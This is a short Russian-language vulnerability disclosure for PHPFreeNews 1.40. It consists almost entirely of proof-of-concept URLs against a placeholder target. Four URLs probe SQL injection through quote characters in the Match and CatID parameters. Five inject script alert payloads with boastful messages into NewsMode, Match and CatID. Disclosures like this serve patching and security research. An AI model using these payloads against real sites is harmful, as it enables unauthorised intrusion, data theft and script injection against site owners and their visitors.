Программа: PHPFreeNews 1.40
Удаленный пользователь может выполнить SQL команды и XSS нападение.
SQL инъекция:
http://[target]/phpfn/SearchResults.php?Match='& NewsMode=1&SearchNews=Search&Ca tID=0
http://[target]/phpfn/SearchResults.php?Match=1& NewsMode=1&SearchNews=Search&CatID='
http://[target]/phpfn/SearchResults.php?Match=%27 &NewsMode=1&SearchNews=S earch&CatID=0
http://[target]/phpfn/SearchResults.php?Match=1& NewsMode=1&SearchNews=Search&CatID=%27
XSS:
http://[target]/phpfn/NewsCategoryForm.php?NewsMode="> <script>alert('FoundBy Matrix_Killer');</script>&CatID=0
http://[target]/phpfn/Se archResults.php?Match='> <script>alert('Matrix_Killer
OwnZ The World:)');</script>&NewsMode=1& SearchNews=Search&CatID=0
http://[target]/phpfn/SearchResults.php?Match= 1& NewsMode=1&SearchNews=Search&CatID='>
<script>alert('Hell Year');</script>
http://[target]/phpfn/SearchResults.php?Match=1 &NewsMode="><script>alert('0_o
Please StoP !');</script>&SearchNews=Search&CatID=0
http://[target]/phpfn/SearchResults.php?Match="> <script>alert('Matrix_Killer
-> The bug Hunter <-');</script>&NewsMode=1& SearchNews=Search&CatID=0